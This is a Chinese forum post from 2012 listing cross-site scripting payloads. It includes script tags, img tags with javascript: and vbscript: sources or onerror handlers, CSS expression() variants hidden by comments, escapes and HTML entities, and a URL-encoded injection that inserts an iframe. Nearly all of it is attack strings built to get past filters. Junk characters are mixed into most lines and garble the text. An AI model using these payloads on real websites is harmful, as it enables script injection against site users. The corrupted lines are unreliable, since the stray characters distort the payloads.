<script>alert("跨站")</script> (最常用)
! M3 C) z* S# `% V9 s8 u3 _<img scr=javascript:alert("跨站")></img>! t; Z3 I* \$ H1 {, j7 a: u2 }
<img scr="javascript: alert(/跨站/)></img>
/ C1 L7 e( Q& u8 P<img scr="javas????cript:alert(/跨站/)" width=150></img> (?用tab键弄出来的空格)
- q+ l1 j* f! l) N/ O/ f- D<img scr="#" onerror=alert(/跨站/)></img># i6 Z' I2 g8 S
<img scr="#" style="xss:expression(alert(/xss/));"></img>' E1 {- | l$ i* u, G; N2 Z
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ 表示注释)
0 |, i# Q; G r' i' D+ [<img src=vbscript:msgbox ("xss")></img>, n0 A1 r# U& [1 l- [$ i
<style> input {left:expression (alert('xss'))}</style>$ J2 a) g, W- K
<div style={left:expression (alert('xss'))}></div>
t7 M4 G+ U' O6 X; O<div style={left:exp/* */ression (alert('xss'))}></div>
5 i1 ?. [8 E# I- _/ L<div style={left:\0065\0078ression (alert('xss'))}></div>
0 t9 Q8 q, }2 K+ a; e( y# y. a: shtml 实体 <div style={left:&#x0065;xpression (alert('xss'))}></div>1 M' a: T5 x( V+ H1 E
unicode <div style="{left:expRessioN (alert('xss'))}">5 l, { l2 z( p; C. G
# z; K2 k: `* Y. R G"]}%3Cscript%3Ealert('By b14ckb0y')%3C/script%3E{[&item="]<iframe%20src=http://new.qzone.qq.com/9530772%20width=400%20height=600></iframe>[". m* f! o1 k+ M( E* E. q
|
发表于 2012-9-13 17:15:04
收藏
支持
反对